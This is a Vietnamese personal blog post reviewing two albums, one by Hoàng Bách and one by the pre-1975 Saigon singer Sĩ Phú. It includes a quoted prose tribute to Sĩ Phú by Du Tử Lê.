Có thể Hoàng Bách quá tự tin vào giọng-hát-nhạc-viện được đào tạo bài bản của mình nên anh quyết định giữ lại hoàn toàn cách phối khí của các bài trong album này theo phong cách phối khí đã quen thuộc – và đã được đóng-thương-hiệu các ca sĩ nam, nữ nổi tiếng khác đi trước. Có thể anh nghĩ, giọng hát và cách trình bày của anh là đủ để thính giả cảm thấy sự khác biệt (theo nghĩa hay hơn). Quả thật là có khác biệt.

Khi nghe album này, không quá khó để nhận ra cách hát như đứng dưới vai trò của người thuật chuyện, chứ không còn là người trong câu chuyện của nam ca sĩ. Cũng khó cho anh, với các ca khúc về nỗi đau và chia ly của nhân vật chính, như ‘Sa mạc tình yêu’, ‘Tan tác’, ‘Tàn tro’… đa phần các bản trình bày thành công là đều của các kiều nữ yếu đuối và mỏng manh như sương, cất tiếng hát lên đã đủ khiến người thương (điển hình là Ngọc Lan hay Đặng Lệ Quân của Đài Loan). Bảo một người đàn ông đang gắng xây dựng phong cách lịch lãm như Hoàng Bách hát đúng kiểu đó, và với kiểu phối khí quen thuộc đó, thì ắt là không được. Khi mà anh gắng để làm, thì kiểu hát của anh đã lại đi về hướng dửng dưng; mà khi thuật chuyện anh dửng dưng, thì sẽ dễ khiến thính giả nghĩ anh hời hợt.

Đánh giá quá khắt khe thế thì cũng thấy hơi áy náy, vì giọng Hoàng Bách hoàn toàn không dở, nhưng quả thật anh làm khó thính giả quá. Anh muốn giữ cách hòa âm, phối khí như kiểu xa xưa (trong bài phỏng vấn nào đó của anh đã nói thế), nhưng nếu thính giả nào đã quen với các bản nhạc qua giọng ca quen thuộc năm nào, thì sẽ khó để thấy bản của anh hay. Liệu không biết những ai chưa từng nghe qua, thấy yêu thích những bản năm nào, thì có thấy album này của Hoàng Bách hay không? Chứ tôi làm không được rồi đấy..

Sĩ Phú – Còn chút gì để nhớ

Làng ca nhạc văn nghệ Sài Gòn trước 1975 không thiếu những giọng ca nam đỉnh. Đó là thời điểm u ám về lịch sử nhưng tuyệt diệu về nghệ thuật mà có lẽ phải lâu, rất lâu sau mới gặp lại được. Các nam ca sĩ thời đó mỗi người một vẻ, có những người hừng hực bùng nổ với những bản nhạc tình kích động; có người hát về sự đau thương và bi sầu của chia ly thời cuộc; lại có những người chỉ đơn thuần hát nhạc tình, rất trầm ấm, nhẹ nhàng và lịch lãm. Sĩ Phú là một cái tên như thế.

Không xuất thân là ca sĩ chuyên nghiệp, đối với Sĩ Phú, ca hát chắc chỉ như một nhánh rẽ tình cờ của số mệnh, nhưng với nhiều người, Sĩ Phú xứng với một chỗ đứng thật cao trong làng tân nhạc Việt Nam, như một trong những cái tên góp phần lớn làm nên cái thời điểm tuyệt diệu ấy.

Khi còn ở Việt Nam, Sĩ Phú đã cộng tác với Phạm Mạnh Cương trong một số băng đĩa nhạc mang nhãn hiệu Tú Quỳnh, và sau 1975 khi qua hải ngoại, Sĩ Phú cũng tiếp tục góp tên mình trong một loạt CD khác. Nhưng nếu phải lựa CD của Sĩ Phú mà tôi thích nhất, thì chắc đó sẽ là “Còn chút gì để nhớ”.

“Còn chút gì để nhớ” là CD được thực hiện chỉ 3 tuần trước khi Sĩ Phú ra đi vĩnh viễn, được ra mắt tại vũ trường Majestic vào năm 2000. Thời điểm đó, CD này gây được tiếng vang khá lớn trong cộng đồng âm nhạc hải ngoại. Buổi ra mắt CD có sự góp mặt của phần lớn các tên tuổi nổi tiếng nhất trong nền nhạc hải ngoại thời bấy giờ. Thật ra, CD này không phải tập hợp tất cả những bài hay nhất của Sĩ Phú (theo ý tôi), nhưng có những bài mà có lẽ với tôi, nghe ca sĩ nào khác trình bày cũng thấy không hay được bằng nữa.

Sáng thứ 2 đầu tuần, tới công ty, vừa uống cafe vừa nghe lại CD này và đọc lời của Du Tử Lê:

Nếu ta có thể hình dung mỗi tiếng hát tự thân là một nhan sắc; thì sớm, muộn gì, nắng, mưa cũng sẽ mang đến cho ta một, hay nhiều phó bản.

Với sức sống ngồn ngộn bình minh của những lên đường rói tươi, và, với kỹ thuật, đôi khi phó bản đã làm mờ, lu; thậm chí, đẩy lui chính bản vào quên lãng. Nhưng, tiếng hát Sĩ Phú, trong cảm nhận của tôi, không chỉ là một nhan sắc có lấy cho nó một thời, rực rỡ; mà, hằng hàng riêng, lẻ.

Hơn ba mươi năm kể từ ngày tiếng hát Sĩ Phú chợt cất lên, nhu một viễn du bốc đồng hạnh phúc và, khổ đau cùng lúc, đã trôi qua.

Hơn ba mươi năm, tôi nghĩ, dù cho nhận, biết; nắng, mưa dường như bất lực, hay lú lẫn chối bỏ thói quen hăm hở tạo, sinh phó bản.

Cũng có thế, tự căn bản, nắng mưa đã bẵng quên tạo sẵn mẫu mã, trước khi gửi vào tiếng hát Sĩ Phú, một nhan sắc…

Nên tiếng hát kia, nhan sắc nọ, sẽ mãi còn, như một tình yêu đời, đời đi tìm trái tim thất lạc, của chính nó.

Thế là quá đủ để bắt đầu một tuần mới rồi. Hi`.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.